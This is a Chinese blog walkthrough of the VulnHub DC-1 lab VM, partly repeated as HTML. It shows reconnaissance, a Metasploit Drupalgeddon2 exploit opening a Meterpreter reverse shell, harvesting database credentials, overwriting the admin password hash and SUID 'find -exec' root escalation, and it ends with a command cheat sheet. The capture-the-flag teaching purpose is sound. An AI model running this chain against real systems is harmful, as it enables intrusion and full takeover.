DC-1靶机渗透实战走远了但我又走近了

博主： 0x0111
发布时间：2025 年 10 月 14 日
29 次浏览
15274字数
分类：默认分类渗透

DC-1

⚠️安全声明
本文档仅用于以下合法目的：
网络安全教育与学术研究
授权渗透测试与安全评估
CTF竞赛解题过程分享
企业安全防护能力建设
重要提醒：
文中涉及的技术仅可在自己拥有或获得明确授权的系统上使用
未经授权对他人系统进行测试属于违法行为
请遵守《网络安全法》及相关法律法规
建议在隔离的实验室环境中实践这些技术

白切菜鸡自成长

靶机下载地址：https://download.vulnhub.com/dc/DC-1.zip

将DC-1靶机和kali两个虚拟机的网卡都设置为nat模式，保证这两个在同一局域网内

参考：经典 DC-1 靶机渗透实战，这渗透也也也太好玩了吧 (qq.com)

信息搜集&&目录扫描

sudo netdiscover

如果没扫出来，将两个虚拟机重启

 Currently scanning: 172.16.0.0/16   |   Screen View: Unique Hosts                                        
                                                                                                          
 23 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 1380                                        
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.221.1   00:50:56:c0:00:08     19    1140  VMware, Inc.                                           
 192.168.221.2   00:50:56:f0:9f:9f      2     120  VMware, Inc.                                           
 192.168.221.137 00:0c:29:32:c5:23      1      60  VMware, Inc.                                           
 192.168.221.254 00:50:56:f8:7a:af      1      60  VMware, Inc.

nmap -sV 192.168.221.2

Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 02:33 EDT
Nmap scan report for 192.168.221.2
Host is up (0.0091s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE    VERSION
53/tcp open  tcpwrapped
MAC Address: 00:50:56:F0:9F:9F (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.90 seconds

得到53端口打开，发现是DNS服务，有可能是扫错IP了，看看1

nmap 192.168.221.1

Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 02:37 EDT
Nmap scan report for 192.168.221.1
Host is up (0.00018s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)

~.254的结果为空，那么就锁定在~.1上

搜索了一下，好像135、137和445都不和网站有关系，将两个虚拟机重启一下，获得到一个新的ip

nmap 192.168.221.137

Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 02:55 EDT
Nmap scan report for 192.168.221.137
Host is up (0.00017s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind
MAC Address: 00:0C:29:32:C5:23 (VMware)

这下正常多了

登上看一下

$![image-20251013145958082](I:\01_渗透\02_笔记\DC-1.assets\image-20251013145958082.png)$

nmap -sV ip可以查看服务名称

Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 03:01 EDT
Nmap scan report for 192.168.221.137
Host is up (0.000090s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
MAC Address: 00:0C:29:32:C5:23 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.94 seconds

是apache搭建的网站

查看网站技术栈（识别网站的 Web 框架、CMS、JavaScript 库），查看是否有EOL（End-of-Life)的版块，EOL会存在大量的公开漏洞

whatweb -v http://192.168.221.137/

WhatWeb report for http://192.168.221.137/
Status    : 200 OK
Title     : Welcome to Drupal Site | Drupal Site
IP        : 192.168.221.137
Country   : RESERVED, ZZ

Summary   : Apache[2.2.22], Content-Language[en], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], PHP[5.4.45-0+deb7u14], Script[text/javascript], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.2.22 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Content-Language ]
        Detect the content-language setting from the HTTP header. 

        String       : en

[ Drupal ]
        Drupal is an opensource CMS written in PHP. 

        Aggressive function available (check plugin file or details).
        Google Dorks: (1)
        Website     : http://www.drupal.org

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Debian Linux
        String       : Apache/2.2.22 (Debian) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Website     : http://jquery.com/

[ MetaGenerator ]
        This plugin identifies meta generator tags and extracts its 
        value. 

        String       : Drupal 7 (http://drupal.org)

[ PHP ]
        PHP is a widely-used general-purpose scripting language 
        that is especially suited for Web development and can be 
        embedded into HTML. This plugin identifies PHP errors, 
        modules and versions and extracts the local file path and 
        username if present. 

        Version      : 5.4.45-0+deb7u14
        Google Dorks: (3)
        Website     : http://www.php.net/

[ PasswordField ]
        find password fields 

        String       : pass (from field name)

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 

        String       : text/javascript

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all 
        the standard headers and many non standard but common ones. 
        Interesting but fairly common headers should have their own 
        plugins, eg. x-powered-by, server and x-aspnet-version. 
        Info about headers can be found at www.http-stats.com 

        String       : x-generator (from headers)

[ X-Powered-By ]
        X-Powered-By HTTP header 

        String       : PHP/5.4.45-0+deb7u14 (from x-powered-by string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 13 Oct 2025 15:06:42 GMT
        Server: Apache/2.2.22 (Debian)
        X-Powered-By: PHP/5.4.45-0+deb7u14
        Expires: Sun, 19 Nov 1978 05:00:00 GMT
        Last-Modified: Mon, 13 Oct 2025 15:06:42 +0000
        Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
        ETag: "1760368002"
        Content-Language: en
        X-Generator: Drupal 7 (http://drupal.org)
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 2277
        Connection: close
        Content-Type: text/html; charset=utf-8

Web服务器: Apache 2.2.22
CMS: Drupal 7
PHP: 5.4.45

寻找漏洞&&利用漏洞get shell

msfconsole

$![image-20251013151511932](I:\01_渗透\02_笔记\DC-1.assets\image-20251013151511932.png)$

msf > search drupal

Matching Modules
================

   #   Name                                                              Disclosure Date  Rank       Check  Description
   -   ----                                                              ---------------  ----       -----  -----------
   0   exploit/unix/webapp/drupal_coder_exec                             2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1   exploit/unix/webapp/drupal_drupalgeddon2                          2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2     \_ target: Automatic (PHP In-Memory)                            .                .          .      .
   3     \_ target: Automatic (PHP Dropper)                              .                .          .      .
   4     \_ target: Automatic (Unix In-Memory)                           .                .          .      .
   5     \_ target: Automatic (Linux Dropper)                            .                .          .      .
   6     \_ target: Drupal 7.x (PHP In-Memory)                           .                .          .      .
   7     \_ target: Drupal 7.x (PHP Dropper)                             .                .          .      .
   8     \_ target: Drupal 7.x (Unix In-Memory)                          .                .          .      .
   9     \_ target: Drupal 7.x (Linux Dropper)                           .                .          .      .
   10    \_ target: Drupal 8.x (PHP In-Memory)                           .                .          .      .
   11    \_ target: Drupal 8.x (PHP Dropper)                             .                .          .      .
   12    \_ target: Drupal 8.x (Unix In-Memory)                          .                .          .      .
   13    \_ target: Drupal 8.x (Linux Dropper)                           .                .          .      .
   14    \_ AKA: SA-CORE-2018-002                                        .                .          .      .
   15    \_ AKA: Drupalgeddon 2                                          .                .          .      .
   16  exploit/multi/http/drupal_drupageddon                             2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   17    \_ target: Drupal 7.0 - 7.31 (form-cache PHP injection method)  .                .          .      .
   18    \_ target: Drupal 7.0 - 7.31 (user-post PHP injection method)   .                .          .      .
   19  auxiliary/gather/drupal_openid_xxe                                2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   20  exploit/unix/webapp/drupal_restws_exec                            2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   21  exploit/unix/webapp/drupal_restws_unserialize                     2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   22    \_ target: PHP In-Memory                                        .                .          .      .
   23    \_ target: Unix In-Memory                                       .                .          .      .
   24  auxiliary/scanner/http/drupal_views_user_enum                     2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   25  exploit/unix/webapp/php_xmlrpc_eval                               2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 25, use 25 or use exploit/unix/webapp/php_xmlrpc_eval

其中第二个攻击路径的目标包含了Drupal 7.x和 8.x，选择它

msf > use exploit/unix/webapp/drupal_drupalgeddon2

然后看一下这个攻击方式需要填什么信息

msf exploit(unix/webapp/drupal_drupalgeddon2) > show options

$![image-20251013151910016](I:\01_渗透\02_笔记\DC-1.assets\image-20251013151910016.png)$

Required一列yes是必填项

RHOSTS (Remote Host): 目标IP地址。
TARGETURI: Drupal的安装路径，如果安装在根目录，就是 /。

设置攻击目标ip

set RHOST 192.168.221.137

展示一些攻击payload

msf exploit(unix/webapp/drupal_drupalgeddon2) > show payloads

开始攻击exploit

msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.221.138:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (40004 bytes) to 192.168.221.137
[*] Meterpreter session 1 opened (192.168.221.138:4444 -> 192.168.221.137:44708) at 2025-10-13 03:24:20 -0400

meterpreter > ls
Listing: /var/www
=================

Mode              Size            Type  Last modified                      Name
----              ----            ----  -------------                      ----
100644/rw-r--r--  747324309678    fil   188498731153-02-08 21:33:43 -0500  .gitignore
100644/rw-r--r--  24769076401799  fil   188498731153-02-08 21:33:43 -0500  .htaccess
100644/rw-r--r--  6360846566857   fil   188498731153-02-08 21:33:43 -0500  COPYRIGHT.txt
100644/rw-r--r--  6231997547947   fil   188498731153-02-08 21:33:43 -0500  INSTALL.mysql.txt
100644/rw-r--r--  8048768714578   fil   188498731153-02-08 21:33:43 -0500  INSTALL.pgsql.txt
100644/rw-r--r--  5574867551506   fil   188498731153-02-08 21:33:43 -0500  INSTALL.sqlite.txt
100644/rw-r--r--  76712410891717  fil   188498731153-02-08 21:33:43 -0500  INSTALL.txt
100755/rwxr-xr-x  77704548337324  fil   188270147139-03-11 10:02:15 -0500  LICENSE.txt
100644/rw-r--r--  35180077129727  fil   188498731153-02-08 21:33:43 -0500  MAINTAINERS.txt
100644/rw-r--r--  23089744188672  fil   188498731153-02-08 21:33:43 -0500  README.txt
100644/rw-r--r--  41412074677674  fil   188498731153-02-08 21:33:43 -0500  UPGRADE.txt
100644/rw-r--r--  28363964029388  fil   188498731153-02-08 21:33:43 -0500  authorize.php
100644/rw-r--r--  3092376453840   fil   188498731153-02-08 21:33:43 -0500  cron.php
100644/rw-r--r--  223338299444    fil   211037522224-07-25 00:21:02 -0400  flag1.txt
040755/rwxr-xr-x  17592186048512  dir   188498731153-02-08 21:33:43 -0500  includes
100644/rw-r--r--  2272037700113   fil   188498731153-02-08 21:33:43 -0500  index.php
100644/rw-r--r--  3019362009791   fil   188498731153-02-08 21:33:43 -0500  install.php
040755/rwxr-xr-x  17592186048512  dir   188498731153-02-08 21:33:43 -0500  misc
040755/rwxr-xr-x  17592186048512  dir   188498731153-02-08 21:33:43 -0500  modules
040755/rwxr-xr-x  17592186048512  dir   188498731153-02-08 21:33:43 -0500  profiles
100644/rw-r--r--  6704443950617   fil   188498731153-02-08 21:33:43 -0500  robots.txt
040755/rwxr-xr-x  17592186048512  dir   188498731153-02-08 21:33:43 -0500  scripts
040755/rwxr-xr-x  17592186048512  dir   188498731153-02-08 21:33:43 -0500  sites
040755/rwxr-xr-x  17592186048512  dir   188498731153-02-08 21:33:43 -0500  themes
100644/rw-r--r--  85645942869477  fil   188498731153-02-08 21:33:43 -0500  update.php
100644/rw-r--r--  9354438772866   fil   188498731153-02-08 21:33:43 -0500  web.config
100644/rw-r--r--  1791001362849   fil   188498731153-02-08 21:33:43 -0500  xmlrpc.php

获取到shell

ls看到有一个flag1.txt

meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.

修改数据&&登录网站

询问AI这个flag内容是什么意思

$![image-20251013153003716](I:\01_渗透\02_笔记\DC-1.assets\image-20251013153003716.png)$

cat sites/default/settings.php

<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

获得到flag2

 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?

$![image-20251013153409255](I:\01_渗透\02_笔记\DC-1.assets\image-20251013153409255.png)$

用户名: dbuser
密码: R0ck3t
数据库: drupaldb

现在我们还是在meterpreter的命令行中，可以输入下面的命令进入到目标主机的shell中

meterpreter > shell -t

[*] env TERM=xterm HISTFILE= /usr/bin/script -qc /bin/bash /dev/null
Process 3415 created.
Channel 3 created.
www-data@DC-1:/var/www$

经典界面

mysql -u dbuser -pR0ck3t -D drupaldb

select * from users;

$![image-20251013192836648](I:\01_渗透\02_笔记\DC-1.assets\image-20251013192836648.png)$

修改admin的密码哈希，我们需要知道哈希方式

分享：忘记Drupal的管理员密码的解决办法 | Drupal China

按照里面的方法

$![image-20251013202119573](I:\01_渗透\02_笔记\DC-1.assets\image-20251013202119573.png)$

php scripts/password-hash.sh 123456

获取到新密码123456的哈希

去到mysql里面修改

mysql> use database;

mysql> update users set pass="$S$D9n2ArcXobfFvuoCXXK4c4tz93ndGPLdEOMqZ9brSnwhJjwFagtC" where name="admin";

然后就可以登上网站

$![image-20251014095505499](I:\01_渗透\02_笔记\DC-1.assets\image-20251014095505499.png)$

flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

利用系统漏洞&&提升权限

将flag3.txt内容询问AI

$![image-20251014100620039](I:\01_渗透\02_笔记\DC-1.assets\image-20251014100620039.png)$

执行

/var/www$ find / -perm -4000

发现find有root权限，其有参数-exec，可以执行任意指令

/usr/bin/find /etc/passwd -exec whoami \;

返回root，再次确认可以提权

/usr/bin/find /etc/passwd -exec /bin/bash -p \;

$![image-20251014101418320](I:\01_渗透\02_笔记\DC-1.assets\image-20251014101418320.png)$

在root权限中，访问/root目录

得到flag

bash-4.2# cd /
bash-4.2# cd root
bash-4.2# cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

如果是普通www用户访问不了/root目录

$![image-20251014101715350](I:\01_渗透\02_笔记\DC-1.assets\image-20251014101715350.png)$

总结

加入一个局域网后

扫描同网段下的ip
```
sudo netdiscover
```

扫描目标ip的端口
```
nmap -sV [目标ip]
```

扫描网站技术栈
```
whatweb http://[目标ip]/
```

利用漏洞

msfconsole
# 搜索目标过时技术栈
msf > search drupal
# 使用漏洞
msf > use exploit/unix/webapp/drupal_drupalgeddon2
# 查看必填项
msf exploit(unix/webapp/drupal_drupalgeddon2) > show options
# 填充必选项
msf exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST [目标ip]
# 查看攻击payload（可以选择）
msf exploit(unix/webapp/drupal_drupalgeddon2) > show payloads
# 开始攻击
msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit

getshell
```
shell -t
```

查看配置
```
cat sites/default/settings.php
```

登录mysql

mysql -u [账号] -p[密码] -D [数据库]

获取特定哈希算法的哈希值
```
php scripts/password-hash.sh  123456
```

修改数据库存储的密码哈希值

mysql> use database;
# 改
mysql> update users set pass="$S$D9n2ArcXobfFvuoCXXK4c4tz93ndGPLdEOMqZ9brSnwhJjwFagtC" where name="admin";

系统提权

# 查看哪些命令有管理员权限
/var/www$ find / -perm -4000
# 确认find是拥有root权限
/usr/bin/find /etc/passwd -exec whoami \;
# find提权
/usr/bin/find /etc/passwd -exec /bin/bash -p \;

最后修改：2025 年 10 月 14 日

很强的定力

DC-1靶机渗透实战走远了但我又走近了

0x0111 • 2025 年 10 月 14 日

<h1>DC-1</h1><blockquote>⚠️安全声明本文档仅用于以下合法目的：<ul><li>网络安全教育与学术研究</li><li>授权渗透测试与安全评估</li><li>CTF竞赛解题过程分享</li><li>企业安全防护能力建设</li></ul>重要提醒：<ul><li>文中涉及的技术仅可在自己拥有或获得明确授权的系统上使用</li><li>未经授权对他人系统进行测试属于违法行为</li><li>请遵守《网络安全法》及相关法律法规</li><li>建议在隔离的实验室环境中实践这些技术</li></ul></blockquote>白切菜鸡自成长靶机下载地址：<a class="no-external-link" href="https://download.vulnhub.com/dc/DC-1.zip" target="_blank">https://download.vulnhub.com/dc/DC-1.zip</a>将DC-1靶机和kali两个虚拟机的网卡都设置为nat模式，保证这两个在同一局域网内参考：<a class="no-external-link" href="https://mp.weixin.qq.com/s/n-HiIR1ub0b0J51XD0Kdzg" target="_blank">经典 DC-1 靶机渗透实战，这渗透也也也太好玩了吧 (qq.com)</a><h2>信息搜集&&目录扫描</h2><code>sudo netdiscover</code>如果没扫出来，将两个虚拟机重启<pre><code> Currently scanning: 172.16.0.0/16 | Screen View: Unique Hosts 
 
 23 Captured ARP Req/Rep packets, from 4 hosts. Total size: 1380 
 _____________________________________________________________________________
 IP At MAC Address Count Len MAC Vendor / Hostname 
 -----------------------------------------------------------------------------
 192.168.221.1 00:50:56:c0:00:08 19 1140 VMware, Inc. 
 192.168.221.2 00:50:56:f0:9f:9f 2 120 VMware, Inc. 
 192.168.221.137 00:0c:29:32:c5:23 1 60 VMware, Inc. 
 192.168.221.254 00:50:56:f8:7a:af 1 60 VMware, Inc. </code></pre><code>nmap -sV 192.168.221.2 </code><pre><code>Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 02:33 EDT
Nmap scan report for 192.168.221.2
Host is up (0.0091s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
MAC Address: 00:50:56:F0:9F:9F (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.90 seconds</code></pre>得到53端口打开，发现是DNS服务，有可能是扫错IP了，看看1<code>nmap 192.168.221.1</code><pre><code>Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 02:37 EDT
Nmap scan report for 192.168.221.1
Host is up (0.00018s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)</code></pre>~.254的结果为空，那么就锁定在~.1上搜索了一下，好像135、137和445都不和网站有关系，将两个虚拟机重启一下，获得到一个新的ip<code>nmap 192.168.221.137</code><pre><code>Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 02:55 EDT
Nmap scan report for 192.168.221.137
Host is up (0.00017s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
MAC Address: 00:0C:29:32:C5:23 (VMware)</code></pre>这下正常多了登上看一下<img src="http://happyprimes.cn/blog/usr/uploads/2025/10/3642732882.png" alt="![image-20251013145958082](I:\01_渗透\02_笔记\DC-1.assets\image-20251013145958082.png)" title="![image-20251013145958082](I:\01_渗透\02_笔记\DC-1.assets\image-20251013145958082.png)" style=""><code>nmap -sV ip</code>可以查看服务名称<pre><code>Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 03:01 EDT
Nmap scan report for 192.168.221.137
Host is up (0.000090s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
MAC Address: 00:0C:29:32:C5:23 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.94 seconds
</code></pre>是apache搭建的网站查看网站技术栈（识别网站的 Web 框架、CMS、JavaScript 库），查看是否有EOL（End-of-Life)的版块，EOL会存在大量的公开漏洞<code>whatweb -v http://192.168.221.137/</code><pre><code>WhatWeb report for http://192.168.221.137/
Status : 200 OK
Title : Welcome to Drupal Site | Drupal Site
IP : 192.168.221.137
Country : RESERVED, ZZ

Summary   : Apache[2.2.22], Content-Language[en], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], PHP[5.4.45-0+deb7u14], Script[text/javascript], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards.

Version      : 2.2.22 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Content-Language ]
        Detect the content-language setting from the HTTP header.

String       : en

[ Drupal ]
        Drupal is an opensource CMS written in PHP.

Aggressive function available (check plugin file or details).
        Google Dorks: (1)
        Website     : http://www.drupal.org

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header.

OS           : Debian Linux
        String       : Apache/2.2.22 (Debian) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX.

Website     : http://jquery.com/

[ MetaGenerator ]
        This plugin identifies meta generator tags and extracts its 
        value.

String       : Drupal 7 (http://drupal.org)

[ PHP ]
        PHP is a widely-used general-purpose scripting language 
        that is especially suited for Web development and can be 
        embedded into HTML. This plugin identifies PHP errors, 
        modules and versions and extracts the local file path and 
        username if present.

Version      : 5.4.45-0+deb7u14
        Google Dorks: (3)
        Website     : http://www.php.net/

[ PasswordField ]
        find password fields

String       : pass (from field name)

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type.

String       : text/javascript

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all 
        the standard headers and many non standard but common ones. 
        Interesting but fairly common headers should have their own 
        plugins, eg. x-powered-by, server and x-aspnet-version. 
        Info about headers can be found at www.http-stats.com

String       : x-generator (from headers)

[ X-Powered-By ]
        X-Powered-By HTTP header

String       : PHP/5.4.45-0+deb7u14 (from x-powered-by string)

HTTP Headers:
 HTTP/1.1 200 OK
 Date: Mon, 13 Oct 2025 15:06:42 GMT
 Server: Apache/2.2.22 (Debian)
 X-Powered-By: PHP/5.4.45-0+deb7u14
 Expires: Sun, 19 Nov 1978 05:00:00 GMT
 Last-Modified: Mon, 13 Oct 2025 15:06:42 +0000
 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
 ETag: &quot;1760368002&quot;
 Content-Language: en
 X-Generator: Drupal 7 (http://drupal.org)
 Vary: Accept-Encoding
 Content-Encoding: gzip
 Content-Length: 2277
 Connection: close
 Content-Type: text/html; charset=utf-8
</code></pre><ul><li>Web服务器: Apache 2.2.22</li><li>CMS: Drupal 7</li><li>PHP: 5.4.45</li></ul><h2>寻找漏洞&&利用漏洞get shell</h2><code>msfconsole</code><img src="http://happyprimes.cn/blog/usr/uploads/2025/10/945228894.png" alt="![image-20251013151511932](I:\01_渗透\02_笔记\DC-1.assets\image-20251013151511932.png)" title="![image-20251013151511932](I:\01_渗透\02_笔记\DC-1.assets\image-20251013151511932.png)" style=""><code>msf &gt; search drupal</code><pre><code>Matching Modules
================

#   Name                                                              Disclosure Date  Rank       Check  Description
   -   ----                                                              ---------------  ----       -----  -----------
   0   exploit/unix/webapp/drupal_coder_exec                             2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1   exploit/unix/webapp/drupal_drupalgeddon2                          2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2     \_ target: Automatic (PHP In-Memory)                            .                .          .      .
   3     \_ target: Automatic (PHP Dropper)                              .                .          .      .
   4     \_ target: Automatic (Unix In-Memory)                           .                .          .      .
   5     \_ target: Automatic (Linux Dropper)                            .                .          .      .
   6     \_ target: Drupal 7.x (PHP In-Memory)                           .                .          .      .
   7     \_ target: Drupal 7.x (PHP Dropper)                             .                .          .      .
   8     \_ target: Drupal 7.x (Unix In-Memory)                          .                .          .      .
   9     \_ target: Drupal 7.x (Linux Dropper)                           .                .          .      .
   10    \_ target: Drupal 8.x (PHP In-Memory)                           .                .          .      .
   11    \_ target: Drupal 8.x (PHP Dropper)                             .                .          .      .
   12    \_ target: Drupal 8.x (Unix In-Memory)                          .                .          .      .
   13    \_ target: Drupal 8.x (Linux Dropper)                           .                .          .      .
   14    \_ AKA: SA-CORE-2018-002                                        .                .          .      .
   15    \_ AKA: Drupalgeddon 2                                          .                .          .      .
   16  exploit/multi/http/drupal_drupageddon                             2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   17    \_ target: Drupal 7.0 - 7.31 (form-cache PHP injection method)  .                .          .      .
   18    \_ target: Drupal 7.0 - 7.31 (user-post PHP injection method)   .                .          .      .
   19  auxiliary/gather/drupal_openid_xxe                                2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   20  exploit/unix/webapp/drupal_restws_exec                            2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   21  exploit/unix/webapp/drupal_restws_unserialize                     2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   22    \_ target: PHP In-Memory                                        .                .          .      .
   23    \_ target: Unix In-Memory                                       .                .          .      .
   24  auxiliary/scanner/http/drupal_views_user_enum                     2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   25  exploit/unix/webapp/php_xmlrpc_eval                               2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

Interact with a module by name or index. For example info 25, use 25 or use exploit/unix/webapp/php_xmlrpc_eval
</code></pre>其中第二个攻击路径的目标包含了Drupal 7.x和 8.x，选择它<code>msf &gt; use exploit/unix/webapp/drupal_drupalgeddon2</code>然后看一下这个攻击方式需要填什么信息<code>msf exploit(unix/webapp/drupal_drupalgeddon2) &gt; show options</code><img src="http://happyprimes.cn/blog/usr/uploads/2025/10/772713500.png" alt="![image-20251013151910016](I:\01_渗透\02_笔记\DC-1.assets\image-20251013151910016.png)" title="![image-20251013151910016](I:\01_渗透\02_笔记\DC-1.assets\image-20251013151910016.png)" style=""><code>Required</code>一列yes是必填项<ul><li><code>RHOSTS</code> (Remote Host): 目标IP地址。</li><li><code>TARGETURI</code>: Drupal的安装路径，如果安装在根目录，就是 <code>/</code>。</li></ul>设置攻击目标ip<code>set RHOST 192.168.221.137</code>展示一些攻击payload<code>msf exploit(unix/webapp/drupal_drupalgeddon2) &gt; show payloads</code>开始攻击exploit<code>msf exploit(unix/webapp/drupal_drupalgeddon2) &gt; exploit</code><pre><code>[*] Started reverse TCP handler on 192.168.221.138:4444 
[*] Running automatic check (&quot;set AutoCheck false&quot; to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (40004 bytes) to 192.168.221.137
[*] Meterpreter session 1 opened (192.168.221.138:4444 -&gt; 192.168.221.137:44708) at 2025-10-13 03:24:20 -0400

meterpreter &gt; ls
Listing: /var/www
=================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 747324309678 fil 188498731153-02-08 21:33:43 -0500 .gitignore
100644/rw-r--r-- 24769076401799 fil 188498731153-02-08 21:33:43 -0500 .htaccess
100644/rw-r--r-- 6360846566857 fil 188498731153-02-08 21:33:43 -0500 COPYRIGHT.txt
100644/rw-r--r-- 6231997547947 fil 188498731153-02-08 21:33:43 -0500 INSTALL.mysql.txt
100644/rw-r--r-- 8048768714578 fil 188498731153-02-08 21:33:43 -0500 INSTALL.pgsql.txt
100644/rw-r--r-- 5574867551506 fil 188498731153-02-08 21:33:43 -0500 INSTALL.sqlite.txt
100644/rw-r--r-- 76712410891717 fil 188498731153-02-08 21:33:43 -0500 INSTALL.txt
100755/rwxr-xr-x 77704548337324 fil 188270147139-03-11 10:02:15 -0500 LICENSE.txt
100644/rw-r--r-- 35180077129727 fil 188498731153-02-08 21:33:43 -0500 MAINTAINERS.txt
100644/rw-r--r-- 23089744188672 fil 188498731153-02-08 21:33:43 -0500 README.txt
100644/rw-r--r-- 41412074677674 fil 188498731153-02-08 21:33:43 -0500 UPGRADE.txt
100644/rw-r--r-- 28363964029388 fil 188498731153-02-08 21:33:43 -0500 authorize.php
